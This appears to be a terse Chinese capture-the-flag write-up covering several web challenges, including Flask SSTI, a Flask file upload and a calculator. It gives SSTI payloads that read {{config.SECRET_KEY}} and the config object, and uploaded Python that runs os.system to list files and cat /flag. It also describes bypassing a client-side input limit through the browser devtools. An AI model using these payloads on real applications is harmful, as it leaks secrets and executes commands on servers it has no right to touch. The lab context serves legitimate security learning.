Simple_SSTI_1
进入后查看源码
/?flag={{config.SECRET_KEY}}
Simple_SSTI_2
打开题目 需要传入一个名为flag的参数
查看config对象
http://114.67.175.224:16000/?flag={{config}}
SSTI模版注入
查看app文件,用ls查看app文件里面的内容
找到flag
使用cat查看flag文件内容,cat ../app/flag
得到flag
Flask_FileUpload
进入环境查看源代码
import os
print(os.system('ls ./'))
用jpg后缀
查看源代码
查看app.py
查到flag
import os
print(os.system('cat /flag'))
滑稽
计算器
进来发现只有一个框发现只能输入一个数
用检查或F12打开进入修改
然后算数